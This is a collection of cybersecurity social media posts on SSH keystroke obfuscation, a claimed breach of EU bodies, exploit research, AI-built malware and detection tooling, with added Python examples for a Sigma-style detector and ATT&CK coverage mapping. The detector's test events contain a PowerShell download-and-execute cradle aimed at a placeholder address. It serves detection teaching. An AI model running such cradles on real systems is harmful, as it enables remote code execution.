TIL ssh added keystroke timing obfuscation in 2023. Sends garbage packets to avoid revealing what you may be typing based on timing patterns.
Another great blog post by @itseieio
https://t.co/kKybIKygbZ
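The mechanism the post describes, as an added illustration that is not OpenSSH's code: the client stops sending each keystroke the instant it is typed and instead sends one packet per fixed tick, a real one if a keystroke is pending and a chaff packet otherwise, continuing with chaff for a while after typing stops. The keystroke timestamps are constructed, and the observer model, coalescing rule and trailing-chaff draw are this example's simplifications of the scheme OpenSSH 9.5 introduced.

```python
# Added example (not OpenSSH code): a simplified model of the keystroke timing
# obfuscation OpenSSH 9.5 added to ssh(1). Real keystrokes are held until the
# next fixed tick; when nothing is pending a chaff (garbage) packet is sent
# instead, and chaff continues for a while after the last keystroke.
# The observer model, tick handling and trailing-chaff draw are this
# example's simplifications, not the exact OpenSSH implementation.
from dataclasses import dataclass
import random

INTERVAL_MS = 20  # matches OpenSSH's default ObscureKeystrokeTiming interval

# Constructed keystroke timestamps (ms) for one short typed string.
KEYSTROKES_MS = [0, 95, 130, 340, 410, 700]


@dataclass(frozen=True)
class Packet:
    send_ms: int
    real: bool  # True = carries a keystroke; on the wire chaff looks identical


def send_plain(keystroke_ms):
    """Old behaviour: every keystroke goes out the moment it is typed."""
    return [Packet(t, True) for t in sorted(keystroke_ms)]


def send_obscured(keystroke_ms, interval=INTERVAL_MS,
                  trailing_draw=lambda: random.randint(1, 16)):
    """Fixed-interval sending with chaff.

    trailing_draw returns how many chaff ticks to keep sending after a real
    keystroke; the default is random so an observer cannot learn when typing
    really stopped. Pass a constant for reproducible runs.
    """
    pending = sorted(keystroke_ms)
    packets = []
    i = 0              # index of the next keystroke not yet sent
    trailing_left = 0  # chaff ticks still owed after the last real keystroke
    if not pending:
        return packets
    tick = pending[0]  # the first keystroke opens an obfuscated session
    while True:
        ready = 0
        while i < len(pending) and pending[i] <= tick:
            i += 1
            ready += 1
        if ready:
            # keystrokes typed since the last tick are coalesced into one
            # real packet sent on the tick boundary, not when they were typed
            packets.append(Packet(tick, True))
            trailing_left = trailing_draw()
        elif trailing_left > 0:
            packets.append(Packet(tick, False))  # chaff fills the gap
            trailing_left -= 1
        elif i < len(pending):
            tick = pending[i]  # typing paused long enough: start a new session
            continue
        else:
            break
        tick += interval
    return packets


def observed_intervals(packets):
    """What a passive observer sees: inter-packet gaps only, never the flag."""
    times = [p.send_ms for p in packets]
    return [b - a for a, b in zip(times, times[1:])]


if __name__ == "__main__":
    print("plain   :", observed_intervals(send_plain(KEYSTROKES_MS)))
    print("obscured:", observed_intervals(send_obscured(KEYSTROKES_MS, trailing_draw=lambda: 15)))
```

With plain sending the observer reads the inter-keystroke gaps (95, 35, 210, 70, 290 ms) straight off the wire; with obfuscation every gap is 20 ms and the six real keystrokes are hidden among 45 chaff packets. On a real client the behaviour is controlled by the `ObscureKeystrokeTiming` keyword in ssh_config (`yes`, `no`, or `interval:<ms>`), enabled by default since 9.5.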
🚨 MASSIVE CYBERATTACK: The EU Commission, ENISA, and the DG for Digital Services have been compromised by threat actor ShinyHunters.
Leaked data includes:
▪️ Emails & attachments
▪️ Full SSO user directory
▪️ DKIM signing keys
▪️ AWS config snapshots
▪️ NextCloud/Athena data
▪️ Internal admin URLs
It's a mess!
The recording of my first Binary Cartography webinar is now public:
Agentic Reverse Engineering: How AI Agents Are Changing Binary Analysis
Topics: keygenning, cracking & anti-tamper removal
Recording: https://t.co/dheTSRkJqP
Slides/code/samples: https://t.co/nAqtcqVs7i
We open-sourced DetectFlow, a detection intelligence engine that runs Sigma detections on Kafka streams via Flink. Thousands of rules, millisecond matching, before data hits the SIEM. No vendor lock-in. Works air-gapped.
Get repo here: https://t.co/LOqKximbje
#soc
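What "running Sigma detections on a stream" means at the smallest scale, as an added example that is not DetectFlow's code: a minimal evaluator for the Sigma detection format applied to JSON events one line at a time, the way they would arrive from a topic. The rule, the process-creation events and the ConfigMgrTool.exe allow-list filter are constructed; the evaluator covers field lists, the `contains`/`startswith`/`endswith`/`all` modifiers and `and`/`or`/`not` conditions, and leaves out Sigma features such as `re`, `windash` and `1 of them`.

```python
# Added example, not DetectFlow's code: a minimal evaluator for the Sigma
# detection format run over a stream of JSON events. It supports the parts of
# Sigma used by most rules (field lists, the contains/startswith/endswith/all
# modifiers, and/or/not conditions); modifiers such as re, windash and the
# "1 of them" aggregation are out of scope here.
import fnmatch
import json
import re

# Constructed rule: the Python form of a Sigma YAML 'detection' block.
# The filter on a ConfigMgrTool.exe parent is a hypothetical allow-list entry.
RULE = {
    "title": "Suspicious PowerShell download cradle",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains|all": ["Net.WebClient", "DownloadString"],
        },
        "filter": {"ParentImage|endswith": "\\ConfigMgrTool.exe"},
        "condition": "selection and not filter",
    },
}

CRADLE = ("powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
          ".DownloadString('http://203.0.113.5/a.ps1')")

# Constructed process-creation events, one JSON line each, as they would sit
# on a Kafka topic. 203.0.113.5 is a documentation-range address.
EVENT_LINES = [json.dumps(e) for e in [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": CRADLE, "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c whoami", "ParentImage": "C:\\Windows\\explorer.exe"},
    {"Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "CommandLine": "pwsh -c (New-Object Net.WebClient).DownloadFile('http://203.0.113.5/a.exe','a.exe')",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": CRADLE, "ParentImage": "C:\\Tools\\ConfigMgrTool.exe"},
]]


def _value_matches(actual, expected, mods):
    # Sigma string matching is case-insensitive by default
    a, e = str(actual).lower(), str(expected).lower()
    if "contains" in mods:
        return e in a
    if "startswith" in mods:
        return a.startswith(e)
    if "endswith" in mods:
        return a.endswith(e)
    return fnmatch.fnmatchcase(a, e)  # plain value: whole match, * and ? wildcards


def _field_matches(event, key, expected):
    field, *mods = key.split("|")
    if field not in event:
        return False
    values = expected if isinstance(expected, list) else [expected]
    hits = [_value_matches(event[field], v, mods) for v in values]
    return all(hits) if "all" in mods else any(hits)  # list = OR unless |all


def _selection_matches(event, selection):
    return all(_field_matches(event, k, v) for k, v in selection.items())


def _condition_true(condition, results):
    # Only selection names and boolean keywords are accepted; each selection
    # name is replaced by its result before the expression is evaluated.
    py = []
    for tok in re.findall(r"\(|\)|\w+", condition):
        if tok in ("and", "or", "not", "(", ")"):
            py.append(tok)
        elif tok in results:
            py.append(str(results[tok]))
        else:
            raise ValueError(f"unknown selection {tok!r} in condition")
    return bool(eval(" ".join(py), {"__builtins__": {}}, {}))


def match_rule(rule, event):
    det = rule["detection"]
    results = {name: _selection_matches(event, sel)
               for name, sel in det.items() if name != "condition"}
    return _condition_true(det["condition"], results)


def run_stream(rules, raw_lines):
    """Evaluate every rule against every event; return (event index, title) hits."""
    alerts = []
    for i, line in enumerate(raw_lines):
        event = json.loads(line)
        for rule in rules:
            if match_rule(rule, event):
                alerts.append((i, rule["title"]))
    return alerts


if __name__ == "__main__":
    print(run_stream([RULE], EVENT_LINES))
```

Only the first event fires: the second is not PowerShell, the third lacks `DownloadString` so the `|all` modifier fails, and the fourth is suppressed by the filter selection. A stream processor does the same per event, with the rule set compiled once and the matching kept stateless so it scales across partitions.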
I am pleased to announce the publication of the sixth article in the Exploiting Reversing Series (ERS).
Titled "A Deep Dive Into Exploiting a Minifilter Driver (N-day)", this 251-page article provides a comprehensive look at a past vulnerability in a mini-filter driver:
https://t.co/Sh8pgB4bh8
It guides readers through the entire investigation process—beginning with binary diffing and moving through reverse engineering, deep analysis and proof-of-concept stages into full exploit development.
I hope this serves as a valuable resource for your research. If you enjoy the content, please feel free to share it or reach out with feedback.
Have an excellent day!
#Voidlink: a new era of malware has arrived! We discovered that the framework was built nearly end-to-end using agentic AI. It stands as an alarming example of what experienced actors are capable of using artificial intelligence.
https://t.co/4cGE620Nrd
📦 I just released Security-Detections MCP
- a way to let LLMs reason over real detection content, not just the internet.
This isn’t "AI writes detections for you."
It’s:
• Threat report in
• Coverage + gaps out
• Grounded in actual rules (KQL, SPL, Sigma, internal content)
The MCP indexes your detection corpus and exposes it in a way LLMs can query, compare, validate, and explain.
What this enables:
• Faster detection validation
• Identifying blind spots before adversaries do
• Structured markdown reports you can actually act on
• Humans stay in control — AI becomes the force multiplier
Repo ➡️ https://t.co/hF5mrvTJkT
👇Video walkthrough 👇 https://t.co/lp5MW3r6ur
If you’re doing detection engineering, threat hunting, or maintaining a large rule set - this changes how fast you can move.
More coming. This is just the start.
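The "threat report in, coverage + gaps out" step, as an added example that is not the Security-Detections MCP project's code: technique IDs are extracted from a report excerpt and looked up in an index of rules that carry ATT&CK technique tags (Sigma's `attack.tNNNN` tags, or an equivalent field on KQL/SPL content), then emitted as a markdown table. The corpus, rule IDs, titles and the report text are all constructed; the parent-technique fallback that marks a sub-technique as partially covered is this example's choice.

```python
# Added example, not the Security-Detections MCP project's code: the
# "threat report in, coverage + gaps out" step done by hand. Technique IDs
# are pulled from the report text and checked against a detection corpus
# whose rules carry ATT&CK technique tags. Corpus and report are constructed.
import re
from collections import defaultdict

TECHNIQUE_RE = re.compile(r"\bT\d{4}(?:\.\d{3})?\b")

# Constructed detection corpus: mixed formats, technique tags normalised to
# plain ATT&CK IDs. Rule IDs and titles are hypothetical.
CORPUS = [
    {"id": "R1", "format": "sigma", "title": "Suspicious PowerShell download cradle",
     "techniques": ["T1059.001", "T1105"]},
    {"id": "R2", "format": "kql", "title": "Office application spawning a shell",
     "techniques": ["T1566.001"]},
    {"id": "R3", "format": "spl", "title": "LSASS handle opened by non-system process",
     "techniques": ["T1003"]},
    {"id": "R4", "format": "kql", "title": "RDP logon from a new source host",
     "techniques": ["T1021.001"]},
]

# Constructed excerpt of a threat report.
REPORT = """
Initial access was via a spearphishing attachment (T1566.001). The macro
launched PowerShell (T1059.001) to fetch a second stage (T1105), after which
the actor dumped LSASS memory (T1003.001) and moved laterally over SMB admin
shares (T1021.002). C2 used HTTPS (T1071.001).
"""


def extract_techniques(text):
    """Return the sorted set of ATT&CK technique IDs mentioned in the text."""
    return sorted(set(TECHNIQUE_RE.findall(text)))


def index_corpus(rules):
    """Map each technique ID to the IDs of the rules tagged with it."""
    by_technique = defaultdict(list)
    for rule in rules:
        for tech in rule["techniques"]:
            by_technique[tech.upper()].append(rule["id"])
    return by_technique


def assess_coverage(techniques, rules):
    """Classify each technique: covered, partial (parent-only rule) or gap.

    A sibling sub-technique (R4 on T1021.001 when the report says T1021.002)
    is deliberately not counted; it is a different behaviour.
    """
    index = index_corpus(rules)
    result = {}
    for tech in techniques:
        parent = tech.split(".")[0]
        if tech in index:
            result[tech] = ("covered", list(index[tech]))
        elif "." in tech and parent in index:
            result[tech] = ("partial", list(index[parent]))
        else:
            result[tech] = ("gap", [])
    return result


def markdown_report(coverage):
    lines = ["| Technique | Status | Rules |", "|---|---|---|"]
    for tech, (status, rule_ids) in sorted(coverage.items()):
        lines.append(f"| {tech} | {status} | {', '.join(rule_ids) or '-'} |")
    gaps = sorted(t for t, (s, _) in coverage.items() if s == "gap")
    lines += ["", f"Gaps to prioritise: {', '.join(gaps) or 'none'}"]
    return "\n".join(lines)


if __name__ == "__main__":
    print(markdown_report(assess_coverage(extract_techniques(REPORT), CORPUS)))
```

On this input three techniques are covered, LSASS dumping is only partially covered by a parent-level rule, and SMB admin-share lateral movement plus HTTPS C2 come out as gaps. An MCP server wraps exactly this kind of lookup so the model's coverage statements are grounded in the rule index rather than in its training data.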
I analyzed thousands of messages from 35+ suspected state-sponsored hacktivist groups using machine learning—uncovering hidden connections through writing styles, language and topics.
After a year of research, here’s what we found and how we did it. 👇
https://t.co/KUnIhAmuRa
1/
Attack Simulation in Defender for Office 365 now includes new "how to" guides that can be sent to end users to educate them on how to complete security related tasks
https://t.co/PGVDwBDkpX
Here is an open source project that isn't afraid of growth! A reading list for reliable, high-performance scalability.
https://t.co/ce4sQTt6jx
Speedbump: an open source TCP proxy for simulating variable but predictable network latency. It lets developers understand and manage latency in networked environments. (p)
https://t.co/ubpuqyLxIw
The Microsoft Incident Response team just published this amazing playbook which shares best practices for security teams and leaders.
Download it from https://t.co/o5uvjfqJ0H